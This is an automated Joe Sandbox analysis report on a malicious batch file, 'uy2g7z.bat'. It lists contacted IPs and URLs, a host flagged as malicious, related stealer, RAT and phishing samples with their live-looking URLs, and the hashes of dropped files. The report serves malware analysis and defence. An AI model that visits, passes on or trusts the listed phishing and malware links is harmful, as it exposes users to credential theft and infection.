                                                          http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://wns2-am3p.notify.windows.com/?token=AwYAAAAVHcznLkp9fcrV9Clhd2HepVc2%2fAlS973crXBsYmvJM5lgXxsvchost.exe, 00000018.00000003.1776467589.00000276D7C1E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1416391663.00000271202BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712EAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://powerpoint.office.comSRD13svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://outlook.comSRD1-svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1731740290.000002565B3AD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2834498317.000002565B4EB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://word.office.comSRD1#svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2825302592.000002565B443000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1732166559.000002565B443000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore68powershell.exe, 00000005.00000002.1416391663.000002711E8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1416391663.000002711E8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                142.250.181.227
                                                                                		unknownUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                2.16.164.49
                                                                                		unknownEuropean Union
                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                45.94.31.176
                                                                                		unknownNetherlands
                                                                                		395800GBTCLOUDUStrue
                                                                                195.201.57.90
                                                                                		ipwho.isGermany
                                                                                		24940HETZNER-ASDEfalse

                                                                                Private

                                                                                IP
                                                                                192.168.2.10
                                                                                192.168.2.16
                                                                                192.168.2.9

                                                                                General Information

                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1637038
                                                                                Start date and time:2025-03-13 10:24:36 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 11m 9s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:13
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:35
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:uy2g7z.bat
                                                                                Detection:MAL
                                                                                Classification:mal100.spyw.evad.winBAT@19/77@1/7
                                                                                EGA Information:
                                                                                • Successful, ratio: 84.2%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 75
                                                                                • Number of non-executed functions: 320
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .bat

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 20.190.160.22, 20.190.160.132, 20.190.160.17, 40.126.32.76, 20.190.160.65, 20.190.160.66, 20.190.160.64, 20.190.160.20, 52.149.20.212, 150.171.27.10, 2.19.122.64, 172.202.163.200
                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, g.bing.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                • Execution Graph export aborted for target dwm.exe, PID 992 because there are no executed function
                                                                                • Execution Graph export aborted for target powershell.exe, PID 8560 because it is empty
                                                                                • Execution Graph export aborted for target winlogon.exe, PID 556 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                05:25:34API Interceptor153879x Sleep call for process: powershell.exe modified
                                                                                05:26:26API Interceptor21331x Sleep call for process: svchost.exe modified
                                                                                05:26:30API Interceptor9355x Sleep call for process: winlogon.exe modified
                                                                                05:26:31API Interceptor27953x Sleep call for process: lsass.exe modified
                                                                                05:26:34API Interceptor119585x Sleep call for process: dwm.exe modified
                                                                                05:26:47API Interceptor718x Sleep call for process: spoolsv.exe modified
                                                                                05:26:50API Interceptor596x Sleep call for process: cmd.exe modified
                                                                                05:26:50API Interceptor677x Sleep call for process: more.com modified
                                                                                05:26:50API Interceptor584x Sleep call for process: conhost.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                2.16.164.49https://u.pcloud.com/trackmail?url=aHR0cHM6Ly90cmFuc2Zlci5wY2xvdWQuY29tL2Rvd25sb2FkLmh0bWw%2FY29kZT01WnlSbjQ1WjhWVEw4VEc0eks4Wmo4dEo3WkJ4MWZhTm5PNHpKNENRZklkUGRrQzBlT0hDM3kj&token=j7yZZ7ZpkZrwc0kENluc4wtObKMPkdF8xn5b07Get hashmaliciousHTMLPhisherBrowse
                                                                                  Document 000325 Approval from All Saints C of E Primary School.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                    http://handlesandhinges.co.za/hgjpp/clan/ump/cKUu1tpNH1WB8aJqxqx1q/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292Get hashmaliciousHTMLPhisherBrowse
                                                                                      https://360merch-my.sharepoint.com/:u:/p/derek_cummins/Ee8aHkzMy41OgT5fOyc3qz4BdRJzT4bTlOlXY3v0Xazn9Q?e=hZ7jflGet hashmaliciousUnknownBrowse
                                                                                        https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUnGet hashmaliciousHtmlDropperBrowse
                                                                                          https://eficensitcom-my.sharepoint.com/:f:/g/personal/prathyushap_eficensit_com/EmmWsEjkvfRJorJdypQBJdYBR0PBdaEDGU2Tg4-Q6_4WZw?e=8wSnKh&xsdata=MDV8MDJ8dGhvbWFzLmhvZXZlbEBoeWRyYXRpZ2h0LmNvbXwyZjliZjI0NTdmZDI0NDRiNzk1NzA4ZGNkMmYxZTdlNXwxNjAyYWU4MjAyNjY0MGQ2OTEwYjExNjgwZmUwZjZhNXwwfDB8NjM4NjE3MTgzNjU0MDEzNTQyfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=UWhyaGFVOWYxMGt6Z1piU1hUTDdKa2VCeVdQWUZwd2NwR09TSmE2eC9xVT0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                            https://onedrive.live.com/view.aspx?resid=7AEF24C2ECCBD3A%21123&authkey=!ABehDrl0wDeSrDgGet hashmaliciousUnknownBrowse
                                                                                              https://bergtool-my.sharepoint.com/:f:/p/officemgr/EkAEY_TxWUpGjuhgV5jRSO8BD2acB1HjNb72Far_j2tXBg?e=T7fVyKGet hashmaliciousEvilProxyBrowse
                                                                                                https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                  San Xavier District of the Tohono O#U2019odham Nation.pdfGet hashmaliciousUnknownBrowse
                                                                                                    195.201.57.90sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                    • /?output=json
                                                                                                    sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                    • /?output=json
                                                                                                    Flash_USDT_Sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                    • /?output=json
                                                                                                    Flash_USDT_Sender.exeGet hashmaliciousLuca StealerBrowse
                                                                                                    • /?output=json
                                                                                                    SPt4FUjZMt.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLineBrowse
                                                                                                    • /?output=json
                                                                                                    765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                                                                    • /?output=json
                                                                                                    765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                                                                    • /?output=json
                                                                                                    WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                                                                                    • /?output=json
                                                                                                    ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                                                                    • ipwhois.app/xml/
                                                                                                    cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                    • /?output=json

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    ipwho.ishttps://go.51.caGet hashmaliciousUnknownBrowse
                                                                                                    • 195.201.57.90
                                                                                                    PatricksParabox.exe.bin.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 195.201.57.90
                                                                                                    https://tron2wq18ufc.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                    • 195.201.57.90
                                                                                                    Bv8oZ8dqT5.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 195.201.57.90
                                                                                                    FRoijLOGX5.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 195.201.57.90
                                                                                                    xwM9kaAoeY.batGet hashmaliciousUnknownBrowse
                                                                                                    • 195.201.57.90
                                                                                                    Loader.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 195.201.57.90
                                                                                                    a3mJZekUZC.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 195.201.57.90
                                                                                                    skf7iF4.batGet hashmaliciousUnknownBrowse
                                                                                                    • 195.201.57.90
                                                                                                    Roe5bGkYQx.batGet hashmaliciousUnknownBrowse
                                                                                                    • 195.201.57.90

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    AKAMAI-ASN1EUhttp://sg-adh7.vv.885210.xyz/Get hashmaliciousUnknownBrowse
                                                                                                    • 2.21.65.135
                                                                                                    https://habora.co.uk/wp-admin/Ope/renew/Get hashmaliciousUnknownBrowse
                                                                                                    • 2.22.242.97
                                                                                                    https://stearncommmunity.com/profiles/52829086342741Get hashmaliciousUnknownBrowse
                                                                                                    • 23.197.127.21
                                                                                                    https://9b861c16-89be-495d-af06-94ec1b71b5cd-00-3shcaiuf2cafc.worf.replit.dev/Get hashmaliciousUnknownBrowse
                                                                                                    • 95.101.182.74
                                                                                                    https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                                    • 95.101.149.47
                                                                                                    https://case-id-1000228223704.counselschambers.co.uk/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 2.16.164.8
                                                                                                    https://sceanmcommnunmnlty.com/sotep/aofpe/zoeprGet hashmaliciousUnknownBrowse
                                                                                                    • 95.101.149.47
                                                                                                    https://case-id-1000228220021.counselschambers.co.uk/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 2.18.96.221
                                                                                                    https://case-id-1000228223943.counselschambers.co.uk/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 2.18.96.221
                                                                                                    https://case-id-1000228224364.counselschambers.co.uk/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 88.221.110.227
                                                                                                    HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                                                                    • 88.198.246.242
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    • 88.198.246.242
                                                                                                    http://abhishek9589.github.io/netflixclone/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 78.46.22.25
                                                                                                    http://copyright-accountscenter.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 116.202.166.112
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    • 88.198.246.242
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    • 88.198.246.242
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    • 88.198.246.242
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    • 88.198.246.242
                                                                                                    1.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                    • 213.239.239.164
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    • 88.198.246.242
                                                                                                    GBTCLOUDUSresgod.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 154.37.70.175
                                                                                                    sun-crypter.batGet hashmaliciousQuasarBrowse
                                                                                                    • 45.83.244.141
                                                                                                    cbr.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 45.11.15.111
                                                                                                    cbr.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 45.11.15.120
                                                                                                    vkD9uOwN6K.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 154.9.252.143
                                                                                                    https://o-invoices.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                    • 45.94.31.182
                                                                                                    https://rvsec.innocreed.com/Bin/Invoice_Overdue.Client.exe?h=instance-w08c5r-relay.screenconnect.com&p=443&k=BgIAAACkAABSU0ExAAgAAAEAAQBtb%2FXciCJO5hHyAR3NG5qwkHgKE4K5jxeGBs35Nlncjh1l6g%2B23I88rvlqmL%2FU%2BHDK35q63nY%2BZ%2BacGdqbEGbCs9%2BC5ELjJTyrUFEL0gVqegeArzyszYoIS4ijuI8mGGKzW9tytW5tQhqCPuQeWdSbe0f0ttBWIUk6MfP0L7WpImwpbDzvxtmyMWSxZ8JZg39F6e1w8cQHzLH0aqJX9uvQgIvogbJB0mFXWURVi9ErahW%2BwkXWptsr99acbACeWvHhej11zT9ZPHMMaluuXTiYnS06xPJTJZglT5hvMbl15uReewBWhhwiEVa2S%2BD%2BCQEQGLsz1dpJNd543dQllUPh&s=64c97d87-ba5e-410a-a497-ed72a390ca30&i=&e=Support&y=Guest&r=Get hashmaliciousUnknownBrowse
                                                                                                    • 45.94.31.182
                                                                                                    nklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 216.115.185.204
                                                                                                    m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 154.37.70.199
                                                                                                    g4za.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 216.115.185.217

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ePO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 195.201.57.90
                                                                                                    brave.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • 195.201.57.90
                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 195.201.57.90
                                                                                                    Dhl.exeGet hashmaliciousDarkTortillaBrowse
                                                                                                    • 195.201.57.90
                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 195.201.57.90
                                                                                                    Doc13032025.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 195.201.57.90
                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                    • 195.201.57.90
                                                                                                    1.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                    • 195.201.57.90
                                                                                                    Kiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                    • 195.201.57.90
                                                                                                    RQ-5218.msiGet hashmaliciousAteraAgentBrowse
                                                                                                    • 195.201.57.90

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):404
                                                                                                    Entropy (8bit):3.8173021543470633
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kK3vQ6/YIQklqslltXlRNfOAUMivhClroFH7q0yNXImolv9RUuQ2vmLltC+uWlrn:l/YGjmxMiv8sFbq0yNYmc3Q2XwJ
                                                                                                    MD5:61DF45A4D84B53BFE34FB1C0B289E6E5
                                                                                                    SHA1:F61CD99798E2E1D44CFCB4CCD436E5AB758E2A8F
                                                                                                    SHA-256:88879A8954FD9F061466B4C5C3D5943F0685A4005426DE31ED86E6B72AA60BDB
                                                                                                    SHA-512:3FA283C2B24863C4C03BAC9EF711D8EFEFC3AD316BBF6D3A5D8935FC2873DD81E2DAF71AB76CA195F58A0A2B1F1FBCA68CCD8BEDFE0ECD1ED9F895C5D1BC2098
                                                                                                    Malicious:false
                                                                                                    Preview:p...... .... ....b......(.......2.........ID.....I-m3....................I-m3... ...................................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.A.U.Q.Y.B.M.q.2.a.w.n.1.R.h.6.D.o.h.%.2.F.s.B.Y.g.F.V.7.g.Q.U.A.9.5.Q.N.V.b.R.T.L.t.m.8.K.P.i.G.x.v.D.l.7.I.9.0.V.U.C.E.A.J.0.L.q.o.X.y.o.4.h.x.x.e.7.H.%.2.F.z.9.D.K.A.%.3.D...

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11887
                                                                                                    Entropy (8bit):4.901437212034066
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                                                                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                                                                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                                                                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                                                                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................

                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):412
                                                                                                    Entropy (8bit):3.8588583785256123
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DCN5DamxMiv8sFFKbpgal7BlD30PLRWAkr:A5amxxvPKb7Ph38L6
                                                                                                    MD5:725B8F1C7A54405F9522A3D68F5D6952
                                                                                                    SHA1:6C1FDC32220F404182D6DCF5892143921DF539B2
                                                                                                    SHA-256:A099EF50B6E6FB2194D64621B1612149418F2DEDDED16B303A9BB9D2CF593C00
                                                                                                    SHA-512:4212C1E6988C5443CCF306C68EF926B020E30BA08CE9B2C6810F2583369697D5FF66E50135B38634AEA0B2AA05F1A0DA18453C4F60C93A0643FC2B5FB20C471A
                                                                                                    Malicious:false
                                                                                                    Preview:p...... ....(...^.S.....(.......2.................y28.....................y28... ...................................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.U.Z.Z.S.Z.E.m.l.4.9.G.j.h.0.j.1.3.P.6.8.w.%.3.D...

                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):400
                                                                                                    Entropy (8bit):3.855988276864414
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKujvT5Dll/4XLNfOAUMivhClroFp736ZWx8GrZoAK+SosEwmPcbLOarUuJn:2jvv+bNmxMiv8sFpT6er+OwmUeeL
                                                                                                    MD5:66CA7009B6EF9C9EFEC028EA0034CADE
                                                                                                    SHA1:462BDDEDDFA7DC48D0D83DB3E9109ABF36FD51A8
                                                                                                    SHA-256:75F82E37FC95719DCD4396E02EB85E40DDC85DB38B097245F8BB166FD1EEBF87
                                                                                                    SHA-512:13B835536AC9E69964CC6DAAE2A50EC167CB3207CD14FFEF6E808D3D4207CE4D3CCA75377AB7A7291E76545A00839F8E1CA9BFBB4337C0561487F22D1B25B8CA
                                                                                                    Malicious:false
                                                                                                    Preview:p...... .........2Q.....(.......2.................J......................J... ...............................8...h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.r.j.r.y.d.R.y.t.%.2.B.A.p.F.3.G.S.P.y.p.f.H.B.x.R.5.X.t.Q.Q.U.s.9.t.I.p.P.m.h.x.d.i.u.N.k.H.M.E.W.N.p.Y.i.m.8.S.8.Y.C.E.A.I.5.P.U.j.X.A.k.J.a.f.L.Q.c.A.A.s.O.1.8.o.%.3.D...

                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):412
                                                                                                    Entropy (8bit):3.797011397614759
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKqj/d//3XlRNfOAUMivhClroFFKIhipStaHAaloq09Slscqsn:yjVhmxMiv8sFFKbpgal7BlSs
                                                                                                    MD5:AD716B5FAC5C1BB169CCBBE7EA34A712
                                                                                                    SHA1:999DD0338D557C53FBE3F2D02F80E49389F0AC16
                                                                                                    SHA-256:CAAF669FD757C8DE8F8A918CBAFED1440A9734391B888B82A9A57BF4B314751C
                                                                                                    SHA-512:7D1C96EA628C7DF49754F4C9A942BCFFC128B1678B8A81D20A402EB5FC47FEF6A914B7DBC97B94F4CCFB2B9DDA1D34FB9D5866E5439C304B03783E6F2B1906B1
                                                                                                    Malicious:false
